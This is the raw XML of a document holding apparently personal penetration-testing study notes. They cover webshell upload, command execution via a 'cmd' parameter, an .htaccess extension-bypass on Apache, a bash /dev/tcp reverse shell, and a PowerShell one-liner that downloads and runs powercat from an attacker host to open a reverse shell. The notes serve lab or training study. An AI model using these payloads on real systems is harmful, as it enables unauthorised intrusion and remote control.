      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001087">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, upload webshell.php, and access the file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001088">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you click on the file, you should see something like this in the URL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001089">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="675"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://10.129.235.51/_uploaded/webshell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000108A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="675"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It looks like nothing is happening, so then we edit the URL to run any code we want</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000108B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the url, we add the "cmd" parameter, and then the value is the code we want. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000108C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://10.129.235.51/_uploaded/webshell.php?cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000108D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The page should display the output of the id command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000108E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can then send a request to Burpsuite repeater to try different commands. If we have a GET request right now, use repeater to change it to a POST request. Right-click inside the Request body box, and click on the "Change request method" in order to convert this HTTP GET request to an HTTP POST request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000108F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set up a necat listener: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> nc -lvnp 4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001090">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the repeater tab, we can alter the request and set the following reverse shell payload as a value for the cmd parameter. This reverse shell payload will make the remote host connect back to us with an interactive bash shell on the specified port that we are listening on.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/YOUR_IP_ADDRESS/LISTENING_PORT 0&gt;&amp;1'</w:t>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5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tssmu0tedue2" w:id="135"/>
      <w:bookmarkEnd w:id="135"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to bypass extension restrictions for file upload (including rev shell) on Apache by using .htaccess</w:t>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t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId335">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 we tried uploading a .php shell, but it said we can't upload anything in .php format.</w:t>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">John Hammond has a</w:t>
      </w:r>
      <w:hyperlink r:id="rId336">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId337">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">video</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to explain it well</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>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t xml:space="preserve">From here, we uploaded a php shell but we just faked the extension like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.xx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">x</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which sometimes works </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">since the computer often </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ignores </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the extension and recognizes the php code so it can run the PHP shell fine. </w:t>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t xml:space="preserve">But THIS time, it actually looks at the extension. We know since it prints out the shell code when we try accessing the php shell on the website, instead of running it. This is because it doesn't recognize the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> .xxx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> extension</w:t>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t xml:space="preserve">So, to make the computer recognize this extension, we can use the .htaccess file on Apache to basically tell Apache to treat any file ending in .xxx as PHP code.</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="354"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "AddType application/x-httpd-php .xxx" &gt; .htaccess</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AddType</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache directive that tells the server: “treat files with this extension as this MIME type.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">application/x-httpd-php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the MIME type Apache associates with PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When Apache sees this, it knows: “hand this file off to the PHP interpreter.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.xxx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the file extension we are mapping.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Meaning: any file ending in .xxx will now be processed as PHP code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="354"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload the .htaccess file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="354"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The ".htaccess" file wasn't shown in the "/uploads" directory because it is a hidden file. But after uploading it, I could see the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">web shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> we uploaded just now had been </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rendered </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">when we tried accessing it. The server now renders the ".xxx" extension as PHP. And it allowed me to perform command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="354"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powercat.ps1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (instead of nc.exe) to upgrade from web shell to reverse shell connection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="354"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we need to get powercat.ps1 in our Kali and then host on python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="354"/>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10AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="354"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="354"/>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10B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="354"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we run this command in the webshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="354"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Powershell IEX(New-Object System.Net.WebClient).DownloadString('http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.49.211/powercat.ps1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">');powercat -c </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.49.211</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 80 -e cmd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="354"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We need the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Powershell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" command at the start in order to run the following command as powershell. This is because webshells are likely in CMD format, and the command is in powershell so we need to specify powershell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010B4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010B5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What it does: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> .htaccess is a per-directory config file Apache interprets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The line tells Apache: “treat any file ending in .xxx as PHP code.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Normally, Apache only executes files with .php, .php5, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If upload restrictions block .php files but allow odd extensions (e.g., .xxx), the server wouldn’t normally run them.</w:t>
      </w:r>
    </w:p>
